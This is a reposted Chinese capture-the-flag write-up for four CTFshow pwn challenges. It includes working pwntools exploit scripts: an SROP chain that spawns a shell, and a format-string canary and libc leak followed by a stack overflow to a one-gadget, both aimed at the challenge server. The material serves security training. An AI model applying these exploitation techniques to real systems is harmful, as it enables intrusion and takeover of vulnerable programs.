當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

PWN-PRACTICE-CTFSHOW-7

發(fā)布時間：2023/12/10 编程问答 24 豆豆

生活随笔收集整理的這篇文章主要介紹了 PWN-PRACTICE-CTFSHOW-7 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

PWN-PRACTICE-CTFSHOW-7

- 大吉大利杯-easyrop
- 大牛杯-guess
- 吃雞杯-win_pwn
- 吃雞杯-easy_canary

大吉大利杯-easyrop

棧溢出，SROP

# -*- coding:utf-8 -*- from pwn import * context.log_level="debug" context.arch="amd64" #32位和64位的sigframe結(jié)構(gòu)不同，需要指定處理器架構(gòu) #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28078) elf=ELF("./pwn1")syscall=0x4000DC #syscall gadget buf=0x6000E0 #buf address pop_rax=0x4000DB #pop rax;syscall gadgetsigframe = SigreturnFrame() #sigreturn系統(tǒng)調(diào)用結(jié)束后，由pop恢復的寄存器值，可指定 sigframe.rax = constants.SYS_read sigframe.rdi = 0 sigframe.rsi = buf#輸入數(shù)據(jù)的地址 sigframe.rdx = 0x300 sigframe.rsp = buf#這里設置新的棧頂與read輸入的數(shù)據(jù)地址相同，ret從棧頂彈出一個地址到rip，于是控制了下一條執(zhí)行指令的地址 sigframe.rip = syscallio.recvuntil("Welcome to DJB easyrop!\n") #正常輸入數(shù)據(jù)的地址與返回地址在棧上的偏移為64，填充后rop #pop_rax將rax賦值為15，然后會syscall，即sigreturn系統(tǒng)調(diào)用，將sigframe里設置的寄存器值賦為新的寄存器值 #新的rip為syscall，rax為constants.SYS_read，于是再次執(zhí)行read系統(tǒng)調(diào)用，輸入數(shù)據(jù)的地址為buf payload="a"*64+p64(pop_rax)+p64(15)+str(sigframe) io.send(payload)sigframe = SigreturnFrame() sigframe.rax = constants.SYS_execve sigframe.rdi = buf+0x120 # "/bin/sh\x00"的地址 sigframe.rsi = 0 sigframe.rdx = 0 sigframe.rip = syscall#上面再次執(zhí)行的read系統(tǒng)調(diào)用，輸入數(shù)據(jù)的地址為buf，因為第一個sigreturn設置棧頂rsp也為buf，于是ret要從buf處彈出一個地址到rip，，作為下一條指令的地址，于是輸入到buf的數(shù)據(jù)首先為pop_rax和新的sigframe payload=p64(pop_rax)+p64(15)+str(sigframe) #由ret回到pop rax;syscall 執(zhí)行sigreturn，給寄存器賦值，然后再執(zhí)行execve系統(tǒng)調(diào)用，rdi為"/bin/sh\x00"的地址 payload=payload.ljust(0x120,"\x00")+"/bin/sh\x00" io.send(payload)io.interactive()

大牛杯-guess

nc連上去，直接輸入65538即可得到flag

吃雞杯-win_pwn

exe程序，運行后隨便輸入一個長度為169的字符串，然后回車，即可得到flag

吃雞杯-easy_canary

格式化字符串漏洞泄露canary和libc基地址，然后棧溢出覆蓋返回地址到one-gadget

# -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28140) elf=ELF("./pwn1")number=0x6B8B4567 io.sendlineafter("lucky number:\n",p32(number))#遠程libc libc=ELF("./libc6_2.23-0ubuntu10_amd64.so")#泄露canary和libc基址 payload="%15$p,%21$p" io.sendline(payload) io.recvuntil("0x") canary=int(io.recv(16),16) print("canary=="+hex(canary)) io.recvuntil("0x") __libc_start_main=int(io.recv(12),16)-(0x20830-0x20740) libc_base=__libc_start_main-libc.sym["__libc_start_main"] print("libc_base=="+hex(libc_base)) ogg=libc_base+0x45216payload="a"*72+p64(canary)+"b"*8+p64(ogg) io.sendline(payload)io.interactive() 創(chuàng)作挑戰(zhàn)賽新人創(chuàng)作獎勵來咯，堅持創(chuàng)作打卡瓜分現(xiàn)金大獎

總結(jié)

以上是生活随笔為你收集整理的PWN-PRACTICE-CTFSHOW-7的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。

上一篇：银行非保本理财和基金哪个风险大？两分钟教
下一篇：数据结构 - 栈（链表实现栈的入栈出栈）